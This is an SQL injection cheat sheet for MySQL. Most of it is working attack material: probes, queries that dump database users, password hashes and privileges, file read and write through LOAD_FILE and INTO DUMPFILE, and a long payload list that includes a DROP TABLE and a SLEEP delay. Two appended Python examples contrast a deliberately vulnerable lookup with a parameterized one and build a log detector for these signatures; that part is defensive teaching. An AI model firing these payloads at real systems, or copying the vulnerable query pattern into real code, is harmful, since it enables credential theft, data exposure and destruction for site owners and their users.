SQL Injection in MySQL

Testing for injection

    1' OR '1'='1
    1 AND 1=1

If the injected value returns the same page as the normal value, the input is not being filtered and the query behind it is very likely injectable.

Dumping SQL tables

1. Get SQL version
    SELECT @@version;

2. Get current user
    SELECT user();
    SELECT system_user();

3. List all database users (not system users!)
    SELECT user FROM mysql.user;

4. List password hashes for database users
    SELECT host, user, password FROM mysql.user;
   (On MySQL 5.7 and later the password column is named authentication_string.)

5. Dump all privileges in the databases
    -- list user privs
    SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
    -- list user privs, one column per priv
    SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
    -- list privs on databases (schemas)
    SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
    -- list privs on columns
    SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

6. Dump DBA accounts
    SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
    SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

7. View current database
    SELECT database();

8. View all databases
    SELECT schema_name FROM information_schema.schemata;

9. View columns
    SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

10. View tables
    SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

11. Find a table by a column's name. For example, to find a table with a column called username:
    SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

12. Select by row number
    SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 0;
    SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 1;

13. Read local file
    UNION ALL SELECT LOAD_FILE('file location')

14. Write to local file
    SELECT * FROM mytable INTO DUMPFILE 'file with location';
   (Both LOAD_FILE and INTO DUMPFILE need the FILE privilege and are confined by the server's secure_file_priv setting; leaving FILE ungranted to application accounts and secure_file_priv set is the usual hardening.)

15. Get hostname and IP address
    SELECT @@hostname;

16. Create a new user
    CREATE USER newuser IDENTIFIED BY 'pass1';

17. Delete existing user
    DROP USER olduser;

18. Other injections
    '
    "
    /
    /*
    #
    )
    (
    )'
    ('
    and 1=1
    and 1=2
    and 1>2
    and 1<=2
    +and+1=1
    +and+1=2
    +and+1>2
    +and+1<=2
    /**/and/**/1=1
    /**/and/**/1=2
    /**/and/**/1>2
    /**/and/**/1<=2
    'or"='
    ' or'x'='x
    "or"x"="x
    ')or x=x--
    ')or('x'='x
    ')or 1=1--
    0 or 1=1
    '0 or 0=0--
    " or 0=0--
    or 0=0--
    ' or 0=0 #
    " or 0=0 #
    or 0=0#
    'or 1='1
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--
    1' OR '1'='1
    '='
    ' OR 1 = 1 --
    ' OR 1 --
    1 EXEC SP_ (or EXEC XP_)
    x';-\';
    DESC users;
    -1\'1
    1' AND non_existant_table = '1
    1 AND non_existant_table = 1
    ' OR username IS NOT NULL OR username = '
    1 UNI/**/ON SELECT ALL FROM WHERE
    ' HAVING 1=1 --
    ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --
    '; DROP TABLE sampletable; --
    '; SELECT SLEEP(200); --
    UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
    AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
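The following is an added example, not part of the original cheat sheet, showing why the tautology test at the top of the page works and what the fix looks like on the application side. It uses Python's built-in sqlite3 as a server-less stand-in for MySQL (an assumption: the quoted tautology and the 1=1/1=2 boolean pair behave the same way in both engines); the users table and its rows are constructed here.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for a MySQL table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Vulnerable: untrusted input is spliced into the SQL text inside quotes.

    With user_id = "1' OR '1'='1" the WHERE clause becomes
    id = '1' OR '1'='1', which is true for every row.
    """
    sql = "SELECT username FROM users WHERE id = '" + user_id + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_numeric_vulnerable(conn, user_id):
    """Vulnerable numeric context: this is where the page's 1 AND 1=1 /
    1 AND 1=2 pair applies. A tautology keeps the row, a contradiction
    drops it, so differing responses reveal that the input reaches SQL."""
    sql = "SELECT username FROM users WHERE id = " + user_id + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_id):
    """Hardened: the value is bound as a parameter, never parsed as SQL.

    The same payload is now compared, as a whole string, against the id
    column and matches nothing.
    """
    sql = "SELECT username FROM users WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (user_id,))]


if __name__ == "__main__":
    db = make_db()
    print("normal, vulnerable     :", lookup_vulnerable(db, "1"))
    print("tautology, vulnerable  :", lookup_vulnerable(db, "1' OR '1'='1"))
    print("1 AND 1=1, vulnerable  :", lookup_numeric_vulnerable(db, "1 AND 1=1"))
    print("1 AND 1=2, vulnerable  :", lookup_numeric_vulnerable(db, "1 AND 1=2"))
    print("normal, parameterized  :", lookup_parameterized(db, "1"))
    print("tautology, parameterized:", lookup_parameterized(db, "1' OR '1'='1"))
```

The vulnerable lookup returns every user for the tautology, which is exactly the "same page for injected and normal input" signal the test at the top of the page relies on; the parameterized version returns nothing for it, because the driver sends the payload as data rather than as part of the statement.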
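As a second added example (again not from the original page), here is a small detector that runs the signatures from the payload list above against web-server access logs, the kind of rule a SOC would put in a log pipeline to spot the probing described on this page. The log lines are constructed; the request-line format is assumed to be the common combined format, and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format). Line 2-4 carry
# payload shapes taken from the cheat sheet; line 5 is a benign apostrophe.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:01:09 +0000] "GET /item?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9812
10.0.0.7 - - [12/Mar/2024:10:01:15 +0000] "GET /item?id=1%20UNION%20ALL%20SELECT%20LOAD_FILE(%27/path/to/file%27) HTTP/1.1" 200 1203
10.0.0.7 - - [12/Mar/2024:10:01:20 +0000] "GET /item?id=1/**/and/**/1=1 HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /search?q=o%27reilly HTTP/1.1" 200 2048
"""

# Rule name -> pattern, each one derived from a payload family on the page.
RULES = [
    ("tautology",           re.compile(r"['\"]\s*or\s+['\"]?\w+['\"]?\s*=", re.I)),
    ("boolean_probe",       re.compile(r"\b(?:and|or)\s+\d+\s*[=<>]+\s*\d+", re.I)),
    ("union_select",        re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum",         re.compile(r"\binformation_schema\b|\bmysql\.user\b", re.I)),
    ("file_access",         re.compile(r"\bload_file\s*\(|\binto\s+(?:dump|out)file\b", re.I)),
    ("time_delay",          re.compile(r"\bsleep\s*\(", re.I)),
    ("version_probe",       re.compile(r"@@version|@@hostname", re.I)),
    ("comment_obfuscation", re.compile(r"/\*\*/")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CLIENT_RE = re.compile(r"^(\S+) ")


def normalize(request_target):
    """URL-decode the target and collapse /**/ comment padding into spaces so
    that /**/and/**/1=1 is seen as 'and 1=1' by the keyword rules."""
    decoded = unquote_plus(request_target)
    return decoded, re.sub(r"/\*\*/", " ", decoded)


def scan_log(text):
    """Return (line_number, client_ip, [matched rule names]) for each log line
    whose request matches at least one rule."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        req = REQUEST_RE.search(line)
        if not req:
            continue
        raw, cleaned = normalize(req.group(1))
        matched = []
        for name, pattern in RULES:
            # comment_obfuscation must look at the raw text, the rest at the cleaned form
            haystack = raw if name == "comment_obfuscation" else cleaned
            if pattern.search(haystack):
                matched.append(name)
        if matched:
            client = CLIENT_RE.match(line)
            hits.append((number, client.group(1) if client else "?", matched))
    return hits


if __name__ == "__main__":
    for number, client, names in scan_log(SAMPLE_LOG):
        print(f"line {number} from {client}: {', '.join(names)}")
```

Two design points worth noting: decoding before matching is what lets the URL-encoded `1' OR '1'='1` on line 2 be caught, and the tautology rule deliberately requires an `or` keyword after the quote so that an ordinary apostrophe in a search term (line 5) does not fire. Signature rules like these are a triage aid, not a control; the parameterized query is what actually closes the hole.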